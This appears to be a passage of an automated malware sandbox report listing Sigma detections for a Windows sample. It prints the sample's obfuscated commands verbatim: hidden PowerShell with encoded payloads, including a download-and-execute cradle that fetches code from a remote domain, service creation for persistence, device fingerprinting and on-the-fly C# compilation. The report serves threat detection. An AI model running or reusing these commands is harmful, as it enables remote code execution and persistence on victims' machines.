AcgBhAHkAIAAtAGoAbwBpAG4AIAAiAGAAcgBgAG4AIgAKACQAYwBwAHUASQBuAGYAbwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAKACQAYwBwAHUARABlAHQAYQBpAGwAcwAgAD0AIAAiAFAAcgBvAGMAZQBzAHMAbwByAEkAZAA6ACAAJAAoACQAYwBwAHUASQBuAGYAbwAuAFAAcgBvAGMAZQBzAHMAbwByAEkAZAApACwAIABOAGEAbQBlADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATgBhAG0AZQApACwAIABNAGEAeABDAGwAbwBjAGsAUwBwAGUAZQBkADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATQBhAHgAQwBsAG8AYwBrAFMAcABlAGUAZAApACwAIABVAG4AaQBxAHUAZQBJAGQAOgAgACQAKAAkAGMAcAB1AEkAbgBmAG8ALgBVAG4AaQBxAHUAZQBJAGQAKQAiAAoAJABhAGwAbABJAG4AZgBvACAAPQAgACIAJABjAG8AbQBiAGkAbgBlAGQASQBuAGYAbwBgAHIAYABuACQAYwBwAHUARABlAHQAYQBpAGwAcwAiAAoAJABtAGQANQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBsAGwASQBuAGYAbwApAAoAJABoAGEAcwBoAEIAeQB0AGUAcwAgAD0AIAAkAG0AZAA1AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAJABiAHkAdABlAHMAKQAKACQAaABhAHMAaAAgAD0AIABbAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaABCAHkAdABlAHMAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcALQAnAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaABhAHMAaAA7AAoAfQAKAGMAZAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgA7AAoAJAB0AGUAcwB0ACAAPQAgAEcAZQB0AC0ASQBkAGUAbgB0AGkAdAB5ADsACgAkAHQAZQBzAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAGQAZQB2AGkAYwBlAEkAZAAuAHQAeAB0ACIAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAVABGADgA, CommandLine: "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -Execution

Sigma detected: Suspicious Encoded PowerShell Command Line

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -NoLogo -NoProfile -ExecutionPolicy Bypass -EncodedCommand SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBjAE8ARABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAFQAUwB0AFIASQBOAGcAKAAoAEkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5AGoAYgAyAE4AdgBiAFcAVgAwAGEARwA5AGsAWgBTADUAawBaAFMAOQBQAFMAMAA1AG0AIgApACkAKQApAC4AQwBPAG4AVABFAG4AdAApACkA , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -NoLogo -NoProfile -ExecutionPolicy Bypass -EncodedCommand SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBjAE8ARABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAFQAUwB0AFIASQBOAGcAKAAoAEkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5AGoAYgAyAE4AdgBiAFcAVgAwAGEARwA5AGsAWgBTADUAawBaAFMAOQBQAFMAMAA1AG0AIgApACkAKQApAC4AQwBPAG4AVABFAG4AdAApACkA , CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: pOWERsheLl.eXE -WINDoWSTylE hiDdEN -EncoDEdCommAnd "UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACIALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAiACwAIAAiAC0ATgBvAEwAbwBnAG8AIgAsACAAIgAtAE4AbwBQAHIAbwBmAGkAbABlACIALAAgACIALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACIALAAgACIALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIABTAFEAQgBGAEEARgBnAEEASQBBAEEAbwBBAEYAcwBBAFYAQQBCAEYAQQBGAGcAQQBkAEEAQQB1AEEARQBVAEEAYgBnAEIAagBBAEUAOABBAFIAQQBCAHAAQQBHADQAQQBSAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBsAEEARgBRAEEAVQB3AEIAMABBAEYASQBBAFMAUQBCAE8AQQBHAGMAQQBLAEEAQQBvAEEARQBrAEEAZAB3AEIAeQBBAEMAQQBBAEsAQQBCAGIAQQBGAE0AQQBlAFEAQgB6AEEASABRAEEAWgBRAEIAdABBAEMANABBAFYAQQBCAGwAQQBIAGcAQQBkAEEAQQB1AEEARQBVAEEAYgBnAEIAagBBAEcAOABBAFoAQQBCAHAAQQBHADQAQQBaAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBsAEEASABRAEEAVQB3AEIAMABBAEgASQBBAGEAUQBCAHUAQQBHAGMAQQBLAEEAQgBiAEEARQBNAEEAYgB3AEIAdQBBAEgAWQBBAFoAUQBCAHkAQQBIAFEAQQBYAFEAQQA2AEEARABvAEEAUgBnAEIAeQBBAEcAOABBAGIAUQBCAEMAQQBHAEUAQQBjAHcAQgBsAEEARABZAEEATgBBAEIAVABBAEgAUQBBAGMAZwBCAHAAQQBHADQAQQBaAHcAQQBvAEEAQwBJAEEAWQBRAEIASQBBAEYASQBBAE0AQQBCAGoAQQBFAGcAQQBUAFEAQQAyAEEARQB3AEEAZQBRAEEANQBBAEcAbwBBAFkAZwBBAHkAQQBFADQAQQBkAGcAQgBpAEEARgBjAEEAVgBnAEEAdwBBAEcARQBBAFIAdwBBADUAQQBHAHMAQQBXAGcAQgBUAEEARABVAEEAYQB3AEIAYQBBAEYATQBBAE8AUQBCAFEAQQBGAE0AQQBNAEEAQQAxAEEARwAwAEEASQBnAEEAcABBAEMAawBBAEsAUQBBAHAAQQBDADQAQ

Sigma detected: Suspicious New Service Creation

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto , CommandLine: SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto , CommandLine|base64offset|contains: H, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto & net start "myRdpService", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7608, ParentProcessName: cmd.exe, ProcessCommandLine: SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto , ProcessId: 2764, ProcessName: sc.exe

Sigma detected: Suspicious PowerShell Encoded Command Patterns

Source: Process started

Sigma detected: Suspicious PowerShell Invocations - Specific - PowerShell Module

Source: Event Logs

Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro: Data: ContextInfo: Severity = Informational Host Name = ConsoleHost Host Version = 5.1.19041.1151 Host ID = a52badc0-5ea8-40ff-860c-517cfd816409 Host Application = powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA= Engine Version = 5.1.19041.1151 Runspace ID = 6e86f63a-560f-4a8c-86d5-da67e3f37098 Pipeline ID = 1 Command Name = Add-Type Command Type = Cmdlet Script Name = Command Path = Sequence Number = 16 User = computer\user Connected User = Shell ID = Microsoft.PowerShell, EventID: 4103, Payload: CommandInvocation(Add-Type): "Add-Type"ParameterBinding(Add-Type): name="AssemblyName"; value="System.Windows.Forms", Source: Microsoft-Windows-PowerShell, UserData: , data0: Severity = Informational Host Name = ConsoleHost Host Version = 5.1.19041.1151 Host ID = a52badc0-5ea8-40ff-860c-517cfd816409 Host Application = powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA= Engine Version = 5.1.19041.1151 Runspace ID = 6e86f63a-560f-4a8c-86d5-da67e3f37098 Pipeline ID = 1 Command Name = Add-Type Command Type = Cmdlet Script Name = Command Path = Sequence Number = 16 User = computer\user Connected User = Shell ID = Microsoft.PowerShell, data1: , data2: CommandInvocation(Add-Type): "Add-Type"ParameterBinding(Add-Type): name="AssemblyName"; value="System.Windows.Forms"

Sigma detected: Suspicious PowerShell Parameter Substring

Source: Process started

Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=, CommandLine: powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: /c powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8152, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=, ProcessId: 2828, ProcessName: powershell.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -NoLogo -NoProfile -ExecutionPolicy Bypass -EncodedCommand SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBjAE8ARABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAFQAUwB0AFIASQBOAGcAKAAoAEkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5AGoAYgAyAE4AdgBiAFcAVgAwAGEARwA5AGsAWgBTADUAawBaAFMAOQBQAFMAMAA1AG0AIgApACkAKQApAC4AQwBPAG4AVABFAG4AdAApACkA , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -NoLogo -NoProfile -ExecutionPolicy Bypass -EncodedCommand SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBjAE8ARABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAFQAUwB0AFIASQBOAGcAKAAoAEkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5AGoAYgAyAE4AdgBiAFcAVgAwAGEARwA5AGsAWgBTADUAawBaAFMAOQBQAFMAMAA1AG0AIgApACkAKQApAC4AQwBPAG4AVABFAG4AdAApACkA , CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: pOWERsheLl.eXE -WINDoWSTylE hiDdEN -EncoDEdCommAnd "UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACIALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAiACwAIAAiAC0ATgBvAEwAbwBnAG8AIgAsACAAIgAtAE4AbwBQAHIAbwBmAGkAbABlACIALAAgACIALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACIALAAgACIALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIABTAFEAQgBGAEEARgBnAEEASQBBAEEAbwBBAEYAcwBBAFYAQQBCAEYAQQBGAGcAQQBkAEEAQQB1AEEARQBVAEEAYgBnAEIAagBBAEUAOABBAFIAQQBCAHAAQQBHADQAQQBSAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBsAEEARgBRAEEAVQB3AEIAMABBAEYASQBBAFMAUQBCAE8AQQBHAGMAQQBLAEEAQQBvAEEARQBrAEEAZAB3AEIAeQBBAEMAQQBBAEsAQQBCAGIAQQBGAE0AQQBlAFEAQgB6AEEASABRAEEAWgBRAEIAdABBAEMANABBAFYAQQBCAGwAQQBIAGcAQQBkAEEAQQB1AEEARQBVAEEAYgBnAEIAagBBAEcAOABBAFoAQQBCAHAAQQBHADQAQQBaAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBsAEEASABRAEEAVQB3AEIAMABBAEgASQBBAGEAUQBCAHUAQQBHAGMAQQBLAEEAQgBiAEEARQBNAEEAYgB3AEIAdQBBAEgAWQBBAFoAUQBCAHkAQQBIAFEAQQBYAFEAQQA2AEEARABvAEEAUgBnAEIAeQBBAEcAOABBAGIAUQBCAEMAQQBHAEUAQQBjAHcAQgBsAEEARABZAEEATgBBAEIAVABBAEgAUQBBAGMAZwBCAHAAQQBHADQAQQBaAHcAQQBvAEEAQwBJAEEAWQBRAEIASQBBAEYASQBBAE0AQQBCAGoAQQBFAGcAQQBUAFEAQQAyAEEARQB3AEEAZQBRAEEANQBBAEcAbwBBAFkAZwBBAHkAQQBFADQAQQBkAGcAQgBpAEEARgBjAEEAVgBnAEEAdwBBAEcARQBBAFIAdwBBADUAQQBHAHMAQQBXAGcAQgBUAEEARABVAEEAYQB3AEIAYQBBAEYATQBBAE8AUQBCAFEAQQBGAE0AQQBNAEEAQQAxAEEARwAwAEEASQBnAEEAcABBAEMAawBBAEsAUQBBAHAAQQBDADQAQ

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\40v0i4f3\40v0i4f3.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\40v0i4f3\40v0i4f3.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -NoLogo -NoProfile -ExecutionPolicy Bypass -EncodedCommand SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBjAE8ARABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAFQAUwB0AFIASQBOAGcAKAAoAEkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5AGoAYgAyAE4AdgBiAFcAVgAwAGEARwA5AGsAWgBTADUAawBaAFMAOQBQAFMAMAA1AG0AIgApACkAKQApAC4AQwBPAG4AVABFAG4AdAApACkA , ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1804, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\40v0i4f3\40v0i4f3.cmdline", ProcessId: 8376, ProcessName: csc.exe

Sigma detected: Suspicious Execution of Powershell with Base64

Source: Process started

Author: frack113: Data: Command: pOWERsheLl.eXE -WINDoWSTylE hiDdEN -EncoDEdCommAnd "UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACIALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAiACwAIAAiAC0ATgBvAEwAbwBnAG8AIgAsACAAIgAtAE4AbwBQAHIAbwBmAGkAbABlACIALAAgACIALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACIALAAgACIALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIABTAFEAQgBGAEEARgBnAEEASQBBAEEAbwBBAEYAcwBBAFYAQQBCAEYAQQBGAGcAQQBkAEEAQQB1AEEARQBVAEEAYgBnAEIAagBBAEUAOABBAFIAQQBCAHAAQQBHADQAQQBSAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBsAEEARgBRAEEAVQB3AEIAMABBAEYASQBBAFMAUQBCAE8AQQBHAGMAQQBLAEEAQQBvAEEARQBrAEEAZAB3AEIAeQBBAEMAQQBBAEsAQQBCAGIAQQBGAE0AQQBlAFEAQgB6AEEASABRAEEAWgBRAEIAdABBAEMANABBAFYAQQBCAGwAQQBIAGcAQQBkAEEAQQB1AEEARQBVAEEAYgBnAEIAagBBAEcAOABBAFoAQQBCAHAAQQBHADQAQQBaAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBsAEEASABRAEEAVQB3AEIAMABBAEgASQBBAGEAUQBCAHUAQQBHAGMAQQBLAEEAQgBiAEEARQBNAEEAYgB3AEIAdQBBAEgAWQBBAFoAUQBCAHkAQQBIAFEAQQBYAFEAQQA2AEEARABvAEEAUgBnAEIAeQBBAEcAOABBAGIAUQBCAEMAQQBHAEUAQQBjAHcAQgBsAEEARABZAEEATgBBAEIAVABBAEgAUQBBAGMAZwBCAHAAQQBHADQAQQBaAHcAQQBvAEEAQwBJAEEAWQBRAEIASQBBAEYASQBBAE0AQQBCAGoAQQBFAGcAQQBUAFEAQQAyAEEARQB3AEEAZQBRAEEANQBBAEcAbwBBAFkAZwBBAHkAQQBFADQAQQBkAGcAQgBpAEEARgBjAEEAVgBnAEEAdwBBAEcARQBBAFIAdwBBADUAQQBHAHMAQQBXAGcAQgBUAEEARABVAEEAYQB3AEIAYQBBAEYATQBBAE8AUQBCAFEAQQBGAE0AQQBNAEEAQQAxAEEARwAwAEEASQBnAEEAcABBAEMAawBBAEsAUQBBAHAAQQBDADQAQQBRAHcAQgBQAEEARwA0AEEAVgBBAEIARgBBAEcANABBAGQAQQBBAHAAQQBDAGsAQQAiAA==" , CommandLine: pOWERsheLl.eXE -WINDoWSTylE hiDdEN -EncoDEdCommAnd "UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACIALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAiACwAIAAiAC0ATgBvAEwAbwBnAG8AIgAsACAAIgAtAE4AbwBQAHIAbwBmAGkAbABlACIALAAgACIALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACIALAAgACIALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIABTAFEAQgBGAEEARgBnAEEASQBBAEEAbwBBAEYAcwBBAFYAQQBCAEYAQQBGAGcAQQBkAEEAQQB1AEEARQBVAEEAYgBnAEIAagBBAEUAOABBAFIAQQBCAHAAQQBHADQAQQBSAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBsAEEARgBRAEEAVQB3AEIAMABBAEYASQBBAFMAUQBCAE8AQQBHAGMAQQBLAEEAQQBvAEEARQBrAEEAZAB3AEIAeQBBAEMAQQBBAEsAQQBCAGIAQQBGAE0AQQBlAFEAQgB6AEEASABRAEEAWgBRAEIAdABBAEMANABBAFYAQQBCAGwAQQBIAGcAQQBkAEEAQQB1AEEARQBVAEEAYgBnAEIAagBBAEcAOABBAFoAQQBCAHAAQQBHADQAQQBaAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBsAEEASABRAEEAVQB3AEIAMABBAEgASQBBAGEAUQBCAHUAQQBHAGMAQQBLAEEAQgBiAEEAR